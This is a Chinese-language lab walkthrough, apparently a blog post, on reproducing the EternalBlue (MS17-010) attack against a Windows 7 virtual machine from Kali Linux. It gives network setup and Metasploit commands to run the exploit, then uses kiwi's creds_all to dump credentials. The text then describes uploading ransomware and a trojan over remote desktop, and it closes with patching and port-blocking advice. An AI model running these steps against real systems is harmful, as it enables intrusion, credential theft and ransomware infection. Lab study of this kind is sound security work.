声明:本文仅限交流学习使用,请勿使用在任何非法商业活动,禁止用于非法用途。否则后果自负。如有侵权,请告知删除,谢谢!
在虚拟机上搭建win7环境(靶机)
攻击者kali2021版:
模拟永恒之蓝攻击过程的话,需要win7(靶机)处于登录状态,来获取用户名和密码从而达到远程控制的目的,模拟hack已经打入内网与靶机处于同一网段(所以用ipcongfig来查看网关信息)
这里的ip和靶机不是同一个网段,dhcp不能自动获取IP地址,所以需要临时配一个IP地址
配置网关信息
iface eth0 inet static //配置eth0使用静态地址
address 192.168.1.53 //配置eth0的固定IP地址,网段要和物理机的一样,且此IP未被使用
netmask 255.255.255.0 //配置子网掩码
getway 192.168.1.1 //配置网关
关闭服务再重启服务,图放上面了。
systemctl stop NetworkManager //NetworkManager这里注意大小写,linux是区分的
systemctl restart networking //重启服务,如果重启服务后查看没有显示就再次输入这个命令
查看网卡信息修改成功
开启永恒之蓝msf模块
msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue#使用ms17_010攻击模块
设置攻击主机的ip地址,显示配置信息。
set rhosts 192.168.219.140
show options
输入run/exploit执行攻击(这个过程需要多等一会儿,如果这里出现问题去看看靶机的防火墙是不是开启了,把防火墙关闭再运行一下就好了)
load kiwi #加载kiwi模块
creds_all #列举所有凭证
这里就可以得到用户名和密码了,然后通过物理机的远程桌面登录靶机进行远程上传勒索病毒
输入密码连接成功,上传木马执行exe文件。
永恒之蓝是个经典的勒索病毒,而现在大多数系统已经打补丁,目前受害系统有Windows7及以下,Windows server2008。及时打补丁KB2919355。开启Windows防火墙,禁用445.139端口。